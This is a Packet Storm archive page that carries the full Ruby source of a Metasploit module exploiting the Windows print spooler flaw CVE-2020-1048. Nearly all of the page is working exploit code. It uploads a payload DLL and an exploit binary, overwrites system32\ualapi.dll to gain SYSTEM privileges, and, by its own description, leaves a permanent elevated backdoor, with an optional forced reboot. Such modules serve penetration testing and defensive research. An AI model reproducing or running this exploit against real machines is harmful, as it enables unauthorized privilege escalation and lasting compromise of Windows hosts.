exploit the possibilities

Microsoft Spooler Local Privilege Elevation

Microsoft Spooler Local Privilege Elevation
Posted Sep 17, 2020
Authored by bwatters-r7, shubham0d, Yarden Shafir, Alex Ionescu | Site metasploit.com

This exploit leverages a file write vulnerability in the print spooler service which will restart if stopped. Because the service cannot be stopped long enough to remove the dll, there is no way to remove the dll once it is loaded by the service. Essentially, on default settings, this module adds a permanent elevated backdoor.

tags | exploit
advisories | CVE-2020-1048
MD5 | dfa46dafd7f5bbc3e8f526a18d5976b2

Microsoft Spooler Local Privilege Elevation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Exploit::EXE

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Microsoft Spooler Local Privilege Elevation Vulnerability',
'Description' => %q{
This exploit leverages a file write vulnerability in the print spooler service
which will restart if stopped. Because the service cannot be stopped long
enough to remove the dll, there is no way to remove the dll once
it is loaded by the service. Essentially, on default settings, this module
adds a permanent elevated backdoor.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Yarden Shafir', # Original discovery
'Alex Ionescu', # Original discovery
'shubham0d', # PoC
'bwatters-r7' # msf module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' =>
[
[ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 04 2019',
'References' =>
[
['CVE', '2020-1048'],
['URL', 'https://windows-internals.com/printdemon-cve-2020-1048/']
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => true
},
'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
)
)

register_options([
OptString.new('EXPLOIT_NAME',
[true, 'The filename to use for the exploit binary (%RAND% by default).', "#{Rex::Text.rand_text_alpha(6..14)}.exe"]),
OptString.new('PAYLOAD_NAME',
[true, 'The filename for the payload to be used on the target host (%RAND%.dll by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
OptString.new('WRITABLE_DIR',
[false, 'Path to write binaries (%TEMP% by default).', nil]),
OptString.new('OVERWRITE_DLL',
[false, 'Filename to overwrite (%WINDIR%\system32\ualapi.dll by default).', nil]),
OptBool.new('RESTART_TARGET',
[true, 'Restart the target after exploit (you will lose your session until a second reboot).', false]),
OptInt.new('EXECUTE_DELAY',
[true, 'The number of seconds to delay between file upload and exploit launch', 3])
])
end

def cve_2020_1048_privileged_filecopy(destination_file, source_file, exploit_path, target_arch, force_exploit = false)
# Upload Exploit
if target_arch == ARCH_X86
vprint_status('Using x86 binary')
exploit_bin = exploit_data('CVE-2020-1048', 'cve-2020-1048-exe.Win32.exe')
else
vprint_status('Using x64 binary')
exploit_bin = exploit_data('CVE-2020-1048', 'cve-2020-1048-exe.x64.exe')
end
vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}")
if file?(exploit_path)
print_error("#{exploit_path} already exists")
return false unless force_exploit
end
fail_with(Failure::BadConfig, 'No exploit binary found') if exploit_bin.nil?
write_file(exploit_path, exploit_bin)
print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")

# Run Exploit
vprint_status('Running Exploit')
begin
output = cmd_exec('cmd.exe', "/c #{exploit_path} #{destination_file} #{source_file}")
rescue Rex::TimeoutError => e
elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
print_error('Caught timeout. Exploit may be taking longer or it may have failed.')
end
output
end

def exploit
exploit_name = datastore['EXPLOIT_NAME']
vprint_status("exploit_name = #{exploit_name}")
exploit_name = "#{exploit_name}.exe" unless exploit_name.end_with?('.exe')
payload_name = datastore['PAYLOAD_NAME']
if datastore['OVERWRITE_TARGET'].nil? || datastore['OVERWRITE_TARGET'].empty?
win_dir = session.sys.config.getenv('windir')
overwrite_target = "#{win_dir}\\system32\\ualapi.dll"
else
overwrite_target = datastore['OVERWRITE_TARGET']
end
temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')
payload_path = "#{temp_path}\\#{payload_name}"
exploit_path = "#{temp_path}\\#{exploit_name}"
payload_dll = generate_payload_dll

# Check target
vprint_status('Checking Target')
validate_active_host
validate_payload
fail_with(Failure::BadConfig, "#{temp_path} does not exist on the target") unless directory?(temp_path)

# Upload Payload
vprint_status('Uploading Payload')
ensure_clean_destination(payload_path)
write_file(payload_path, payload_dll)
print_status("Payload (#{payload_dll.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
print_warning("This exploit requires manual cleanup of the payload #{payload_path}")
vprint_status("Sleeping for #{datastore['EXECUTE_DELAY']} seconds before launching exploit")
sleep(datastore['EXECUTE_DELAY'])

# Run the exploit
output = cve_2020_1048_privileged_filecopy(overwrite_target, payload_path, exploit_path, sysinfo['Architecture'])
vprint_status("Exploit output:\n#{output}")
sleep(1) # make sure exploit is finished
vprint_status("Removing #{exploit_path}")
session.fs.file.rm(exploit_path)

# Reboot, if desired
if datastore['RESTART_TARGET']
sleep(10)
vprint_status("Rebooting #{sysinfo['Computer']}")
reboot_command = 'shutdown /r'
begin
cmd_exec('cmd.exe', "/c #{reboot_command}")
rescue Rex::TimeoutError => e
elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
print_error('Caught timeout. Exploit may be taking longer or it may have failed.')
end
end
end

def validate_active_host
begin
print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
rescue Rex::Post::Meterpreter::RequestError => e
elog('Could not connect to session', error: e)
raise Msf::Exploit::Failed, 'Could not connect to session'
end
end

def validate_payload
vprint_status("Target Arch = #{sysinfo['Architecture']}")
vprint_status("Payload Arch = #{payload.arch.first}")
unless payload.arch.first == sysinfo['Architecture']
fail_with(Failure::BadConfig, 'Payload arch must match target arch')
end
end

def check
sysinfo_value = sysinfo['OS']
build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
vprint_status("Build Number = #{build_num}")
return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18363

return Exploit::CheckCode::Safe
end

def ensure_clean_destination(path)
return unless file?(path)

print_status("#{path} already exists on the target. Deleting...")
begin
file_rm(path)
print_status("Deleted #{path}")
rescue Rex::Post::Meterpreter::RequestError => e
elog(e)
print_error("Unable to delete #{path}")
end
end
end
Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    18 Files
  • 22
    Oct 22nd
    16 Files
  • 23
    Oct 23rd
    2 Files
  • 24
    Oct 24th
    1 Files
  • 25
    Oct 25th
    1 Files
  • 26
    Oct 26th
    17 Files
  • 27
    Oct 27th
    19 Files
  • 28
    Oct 28th
    29 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close